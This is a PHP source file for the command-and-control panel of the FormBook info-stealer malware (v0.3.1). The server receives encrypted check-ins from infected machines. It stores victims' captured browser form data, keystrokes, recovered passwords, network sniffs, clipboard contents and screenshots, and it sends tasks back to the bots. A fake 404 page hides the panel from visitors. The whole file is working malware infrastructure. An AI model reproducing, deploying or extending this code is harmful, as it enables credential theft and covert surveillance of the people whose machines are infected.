<?php
header("Content-Type:text/html; charset=utf-8");
require_once 'fb_rcClass.php';
require_once 'fb_HeadDB.php';
//
//FUNCTIONS ///////////////////////////////////////////////////////////////////
function post($str) {
    return filter_input(INPUT_POST, $str);
}
function has_post($str) {
    return filter_has_var(INPUT_POST, $str);
}
function get($str) {
    return filter_input(INPUT_GET, $str);
}
function has_get($str) {
    return filter_has_var(INPUT_GET, $str);
}
function aray($str) {
    $array = $_POST[$str];
    return $array;
}
function server($str) {
    return $_SERVER[$str];//filter_input(INPUT_SERVER, $str);
}
function getIp() {
    return server('REMOTE_ADDR');
}
function lip() {
    $iplong = sprintf ( "%u", ip2long(getIp()) );
    if( $iplong != ip2long("127.0.0.1") ) { return $iplong; }
    return 0;
}
function utf8_str($str)
{
    if((array)$str === $str) { 
        $str = implode_all("+", $str);
    }
    if( function_exists("utf8_decode") ) {
        return utf8_decode($str);
    }else { return $str; }
}
function php_str($str) {
    return str_replace("\"", "[dq]", str_replace("'", "[q]", $str));
}
function oneD_Array($arrayList)
{
    $array = $arrayList;
    if( (array)$array === $array ) {
        foreach ($array as $key => $value) {
            if ((array)$value === $value) {//if it's another array, convert it to string.
                $array[$key] = utf8_str($array[$key]);
            }
        }
    } return $array;
}
function implode_all($glue, $array)
{            
    for($i=0; $i < count($array); $i++) 
    {
        if((array)$array[$i] === $array[$i])
        {
            $array[$i] = implode_all($glue, $array[$i]);
	}
    }            
    return implode($glue, $array);
}

class FB{
    var $query = 0;
    var $db = array(); 
    var $account = array();
    var $dbHandle = array();
    
    var $ID = 0;
    var $vSub = 0; 
    var $vPro = 0;
    var $foundLanguage = '';
    
    var $fbc = NULL;
    var $panel = NULL;
    var $privilege = 0;
    var $accountNumber = ''; 
    
    var $dat = NULL; var $un = NULL; var $br = NULL;
    var $mysql = NULL; var $str = array(); var $path = array();
    
    function __construct()
    {
        global $dbHost, $dbUser, $dbPass, 
        $dbDatabase, $accountNumber, $vSub;
        
        $vPro = 1;
        $this->db['host'] = $dbHost; $this->db['user'] = $dbUser;
        $this->db['pass'] = $dbPass; $this->db['name'] = $dbDatabase;
        $this->vSub = $vSub; $this->vPro = $vPro;
        $this->accountNumber = $accountNumber;
        
        $this->dbHandle = init_dbHandle();
    }
    
    function get_query() 
    {
        $this->query = 0;
        if( has_post("un") && has_post("dat") && has_post("br") )
        {
            $this->dat = post("dat"); $this->un = post("un"); $this->br = intval(post("br"));
        
            if( $this->br == 6 ) { $this->query = FBC_POST; }
            
            elseif( $this->br == 7 ) { $this->query = RESULT_POST; }
            
            elseif( $this->br == 8 ) { $this->query = IMAGE_POST; }
            
            elseif( $this->br == 9 ) { $this->query = KEY_POST; }
            
            else { $this->query = FORM_POST; }
        }
        elseif( has_get("id") )//GET.......
        {
            $this->dat = get("id");
            $this->query = KNOCK_POST;
        }
    }
    
    function get_pathsAndLanguage()
    {
        require_once 'fb_Paths.php';
        $langFound = pathAndLanguage( $this );
        
        ob_start(); //ob this because of unicode..
        require_once $this->path['language'];
        ob_end_clean();
        
        head_Error($this);
        return $langFound;
    }
    
    function get_user()
    {
        global $username, $password, $accountName;
        
        $h = 'head_str';
        $this->account['user'] = $username;
        $this->account['pass'] = $password; $this->account['name'] = $accountName;
        $this->str['p404'] = "<html><title>Not found!</title><body><h1>Object not found</h1><p><hr> The requested URL " 
        .server("PHP_SELF")." was not found on this server. ".server("HTTP_HOST")."</p> <h2>Error 404</h2></body></html>";
        
        $this->str['footer'] = "<p><div id='footer'><b>FormBook v0.3.1</b><p>".
        $this->str[$h]['copyright']." &copy; 2015-2017</p></div></p>";
    }
    
    function entry_Err($type)
    {
        $h = 'head_str';
        
        if($type == 1) { echo "<html><title>".$this->str[$h]['version_err']."</title><body><hr><h3>".
        $this->str[$h]['php_v_err']."</h3>".$this->str[$h]['reqV53']."</body></html>"; exit(); }
        
        if($type == 2) { echo "<html><title>".$this->str[$h]['expired_err']."</title><body><hr><div align='center'><h3>".
        $this->str[$h]['sub_expired']."</h3>".$this->str[$h]['sub_expired2']."</div></body></html>"; exit(); }
    }
}

function addNote($fb)
{
    $fb->get_query();
    
    if( $fb->query )
    {
        connect_to_database(FALSE);
        $fb->dbHandle['ip'] = getIp();
        $fb->dbHandle['date'] = date("Y-m-d H:i:s");
        $fb->dbHandle['ost'] = has_post('ost') ? post('ost') : '0';
        $fb->dbHandle['botID'] = has_post('bid') ? post('bid') : '0';
        $fb->dbHandle['countryNumber'] = getCountryNum($fb->mysql, lip());
        $fb->dbHandle['user'] = ($fb->query != KNOCK_POST) ? php_str(base64_decode($fb->un)) : "null";
        
        if( $fb->query == FBC_POST ) {
            require_once 'script/fbConnect/fbc_Post.php';
            fbc_Post( $fb ); //fbc
        }
        elseif( $fb->query == KNOCK_POST ) {
            Log_bot( $fb ); //knock
        }
        elseif( $fb->query == RESULT_POST ) {
            Log_result($fb, FALSE); //task result
        }
        elseif( $fb->query == IMAGE_POST ) {
            Log_image( $fb ); //image
        }
        elseif( $fb->query == KEY_POST ) {
            Log_keys( $fb ); //keystroke/recoveries/sniff/clipboard
        }
        else {
            Log_form( $fb ); //form logs
        }
        mysqli_close($fb->mysql); exit();//Debuger Bug in SqliDriver not fixable..
    }
    
    connect_to_database(TRUE);
    $fb->foundLanguage = $fb->get_pathsAndLanguage();
    
    if( PHP_VERSION_ID < 50300 )
    {
        $fb->entry_Err(1); exit();
    }
    
    if( $fb->vSub && strtotime(date("y.m.d")) > $fb->vSub )
    {
        $fb->entry_Err(2); exit();
    }
}

function Log_form( $fb )
{
    $formfields = NULL;
    //$decoded = $fb->dat;
    $decoded = utf8_str( rcDec( str_replace(" ", "+", $fb->dat), $fb->accountNumber ) );
    if($fb->br > 15 && $fb->br < 64 ) { $fb->br -= 11; }
    $fb->dbHandle['browser'] = $fb->br;

    $postHeader = http_parse_headersFB($decoded);
    if( !isset($postHeader["Host"]) ) { return false; }
    
    $bodyOssfet = substr( strstr($decoded, "\r\n\r\n"), 4);//jump to data offset
    parse_str($bodyOssfet, $formfields);
    $requestfields = oneD_Array($formfields);
    
    $replace_with = array("[q]","[dq]","","","","","","","");
    $badStr = array("'","\"","<noscript>","<?xml","<rss","<channel>","<html>","<script","<!DOCTYPE_html>");
    
    if( substr($postHeader["Host"],0,4 == "www.") ) { 
        $postHeader["Host"] = substr($postHeader["Host"],4);//remove www.
    }
    
    $fb->dbHandle['agent'] = isset($postHeader["User-Agent"]) ? php_str($postHeader["User-Agent"]) : 'null';
    $fb->dbHandle['language'] = isset($postHeader["Accept-Language"]) ? php_str($postHeader["Accept-Language"]) : 'null';
    
    $data = urldecode(reverse_parse($requestfields));
    $fb->dbHandle['host'] = urldecode($postHeader["Host"]);
    $fb->dbHandle['content'] = utf8_str( str_replace($badStr, $replace_with, $data) );

    $existResult = mysqli_query($fb->mysql, "SELECT * FROM logs WHERE `user` = '".$fb->dbHandle['user'].
        "' AND `browser` = '".$fb->dbHandle['browser']."' AND `content` = '".$fb->dbHandle['content']."' LIMIT 1;");
    if( !$existResult || mysqli_num_rows($existResult) ) { return false; }
        
    if( (count($requestfields) > 1) ) 
    {
       $result = mysqli_query($fb->mysql, "SELECT id FROM `blacklisted` WHERE host = '".$fb->dbHandle['host']."';");
        
        if($result && mysqli_num_rows($result) == 0)
        { 
            $result = insertDB($fb, "logs", FALSE);
        }
    }
    elseif( count($requestfields) ) // junk log
    {
        $fb->dbHandle['content'] = $fb->dbHandle['host']."\r\n\r\n".$fb->dbHandle['content'];
        
        $result = insertDB($fb, "junk", TRUE);
    }
    return true;
}

function Log_image($fb)
{
    $TYPE = 0;
    $file_path = "";
    $image = rcDec( str_replace(" ", "+", $fb->dat), $fb->accountNumber );
    
    if( strpos( substr($image,0,6), "FBIMG") !== false )
    {
        $TYPE = FB_BOT;
    }
    else if( strpos( substr($image,0,6), "FBCIM") !== false )
    { 
        $TYPE = FBC_BOT; 
    }
    
    if(!$TYPE) { return 0; }
    $data = substr($image,13);//remove FBIMG
    $id =  substr($image,5,8);
    $path = ($TYPE == FB_BOT) ? "script/screen/" : "script/users/";
    
    //don't return here if mkdir failed
    if( !is_dir($path) ) { mkdir($path,0755,true); }
    
    if( $TYPE == FB_BOT )
    {
        $DB = "screenshots";
        $badStr = array("'","\"",":"," ");
        $replace_with = array("[q]","[dq]","-","-");
    
        $fb->dbHandle['content'] = str_replace($badStr, $replace_with, $fb->dbHandle['date']."--id-".$id );
        insertDB($fb, $DB, TRUE);
    
        $pPsw = base64_decode($fb->accountNumber);
        $cipher = new Crypt_RC4();
        $cipher->setKey($pPsw.$fb->dbHandle['content']);
        $data = $cipher->encrypt( base64_encode($data) );
        $file_path = $path.$fb->dbHandle['content'];
    }
    else 
    { 
        $file_path = $path.$id.".png"; 
        $light = file_get_contents("script/fbConnect/img/on.png");
        if( $light && ($lf=fopen($path.$id."l.png",'w')) )
        {
            fwrite($lf, $light);  
            fclose($lf);
        }
    }
        
    if( !($fp = fopen($file_path, 'w')) ) { return 0; }
    fwrite($fp, $data);  
    fclose($fp);
    return true;
}

function Log_keys($fb)
{
    $decoded = NULL;
    $DB = "keystrokes";
    $log = rcDec( str_replace(" ", "+", $fb->dat), $fb->accountNumber );
    
    if( strpos( substr($log,0,10), "Sniff") !== false ){ 
        $DB = "sniffs";
        $decoded = $log;
    }
    else 
    {
        $decoded = iconv("UTF-16LE", "UTF-8", $log);
    }
    
    if(NULL === $decoded) { return 0; }
        
    $fb->dbHandle['content'] = php_str($decoded);
    
    if( strpos( substr($fb->dbHandle['content'],0,32), "Recovery") !== false ){ 
        $DB = "recoveries"; 
    }
    elseif( strpos( substr($fb->dbHandle['content'],0,32), "Clipboard") !== false ){ 
        $DB = "clipboard"; 
    }
    
    return insertDB($fb, $DB, FALSE);
}

function Log_bot( $fb )
{
    //$log = base64_decode($fb->dat);
    $log = rcDec( str_replace(" ", "+", $fb->dat), $fb->accountNumber );
    $h = explode(':', $log);
    $TYPE = count($h);
    
    if( $TYPE < FB_BOT || $TYPE > FBC_BOT || $h[0] != "FBNG" ){ return 0; }
    
    $fb->dbHandle['bv'] = (strlen($h[1])>8) ? substr($h[1],8,3) : '2.2';
    $fb->dbHandle['status'] = (strlen($h[1])>11) ? '1' : '0';
    
    $fb->ID = substr($h[1],0,8); 
    $fb->dbHandle['os'] = $h[2];
    $fb->dbHandle['botID'] = $fb->ID;
    $fb->dbHandle['user'] = php_str(base64_decode($h[3]));
    $fb->dbHandle['insdate'] = date("Y-m-d H:i:s");
    $fb->dbHandle['actdate'] = date("Y-m-d H:i:s");
    
    $dbName = ($TYPE == FB_BOT) ? 'bots' : 'fbc_users';
    $result = mysqli_query($fb->mysql, "SELECT * FROM ".$dbName." WHERE `botID` = '".$fb->ID."' LIMIT 1;");
    
    if(!$result) { return 0; }
    $updateArray = array("botID","ip","countryNumber","actdate");
    
    if( mysqli_query($fb->mysql, "SELECT * FROM ".$dbName." WHERE `bv` = '0' LIMIT 1;") )
    {
        $updateArray[count($updateArray)] = "bv";
    }
    
    if( mysqli_query($fb->mysql, "SELECT * FROM ".$dbName." WHERE `status` = '0' LIMIT 1;") )
    {
        $updateArray[count($updateArray)] = "status";
    }
    
    if( $TYPE == FBC_BOT )
    {
        if( mysqli_num_rows($result) == 0 )
        {
            $users = mysqli_query($fb->mysql, "SELECT * FROM ".$dbName);
            if( !$users || mysqli_num_rows($users) > 4 ) {  echo outputTaskStream(FBC_DISCONNECT, ""); return; }//diconnect
        }
        $updateArray[count($updateArray)] = "window";
        $fb->dbHandle['window'] = $h[4];
    }
      
    if( mysqli_num_rows($result) == 0 ) 
    {
        insertDB($fb, $dbName, FALSE); return 0;
    }
    else {
        $fb->dbHandle['botID'] = $fb->ID;
        updateDB($fb, $dbName, $updateArray);
    }
    
    if( $TYPE == FB_BOT )
    {
        $bot_task = replyTask( $fb );
        /*/auto restart FBC if disconnected//I don't like this idea but users insist//
        if($bot_task === false) 
        {
            $result = mysqli_query($fb->mysql, "SELECT * FROM fbc_users WHERE `botID` = '".$fb->ID."';");
            if( $result && mysqli_num_rows($result) ) { echo outputTaskStream("FBC", ''); return; }
        }////*/
        echo $bot_task;
    }
    else {
        require_once 'script/fbConnect/fbc_Users.php';
        echo fbc_replyUser( $fb );
    }
}

function Log_result($fb, $local)
{
    //don't exit here cos we haven't send the task request data;
    $botID = NULL; $reply = NULL;
    
    if( $local == TRUE )
    {
        $botID = $fb->ID; $reply = 1; 
    }
    else 
    { 
        $log = rcDec( str_replace(" ", "+", $fb->dat), $fb->accountNumber );
        $h = explode(':', $log);
        if( count($h) != 4 || $h[0] != "FBNG"){ return FALSE; }
        $botID = substr($h[1],0,8); $reply = $h[3];
    }
    
    $result = mysqli_query($fb->mysql, "SELECT * FROM tasks WHERE status='1';");
    if(!$result) { return FALSE; }
    
    while( $row = mysqli_fetch_array($result) )
    {
        if( strpos($row["botsid"], $botID) !== FALSE )
        {
            $failed = $row["failed"];
            $status = $row["status"];
            $executed = $row["executed"];
            $botsid = str_replace($botID.":", "", $row["botsid"]);
            
            if( $reply == "1" ) { $executed += 1; }
            else if( $reply == "2" ){ $failed += 1; }
            
            if( ($executed + $failed) == $row["botnum"]) { $status = 3; }
            
            $update = "UPDATE tasks SET botsid='".$botsid."', executed='".$executed
                ."', failed='".$failed."', status='".$status."' WHERE id='".$row["id"]."';";
            
            mysqli_query($fb->mysql,$update);
            return  TRUE;
        }
    }  
    return FALSE;
}

function reverse_parse($array)
{
    $data = '';
    foreach ($array as $key => $value) 
    {
        $data .= utf8_str($key)."=".utf8_str($value)."&";
    }
    $data .= '&;';
    return str_replace('&&;', '', $data);// remove the appended &
}

function getCountryNum($mysql, $iplong) 
{
    if( !$iplong ) { return 0; }
    
    $qStr = "SELECT cnum FROM geoip WHERE ".$iplong." BETWEEN iplong_start AND iplong_end LIMIT 1";
    $qres = mysqli_query($mysql, $qStr);
    
    if( $qres ) 
    { 
        if( mysqli_num_rows($qres) ) 
        {
            $row = mysqli_fetch_array($qres);
            return $row[0];
        }    
    }else {
        return 0;
    }
    return 0;
}

function http_parse_headersFB($raw_headers)
{
    $key = ''; // [+]
    $headers = array();
       
    $i = 0;
    foreach( explode("\n", $raw_headers) as $i => $h)
    {
        $h = explode(':', $h, 2);

        if(isset($h[1]))
        {
            if ( !isset($headers[$h[0]]) ) {
                $headers[$h[0]] = trim($h[1]);
            }
            elseif (is_array($headers[$h[0]])) {
                // $tmp = array_merge($headers[$h[0]], array(trim($h[1])));
                $headers[$h[0]] = array_merge($headers[$h[0]], array(trim($h[1]))); // [+]
            }
            else {
                // $tmp = array_merge(array($headers[$h[0]]), array(trim($h[1])));
                $headers[$h[0]] = array_merge(array($headers[$h[0]]), array(trim($h[1]))); // [+]
            }
            $key = $h[0]; // [+]
        }
        else // [+]
        { // [+]
            if (substr($h[0], 0, 1) == "\t") {
                $headers[$key] .= "\r\n\t".trim($h[0]); // [+]
            }
            elseif (!$key) {
                $headers[0] = trim($h[0]);trim($h[0]); // [+]
            }
        } // [+]
    }
    return $headers;
}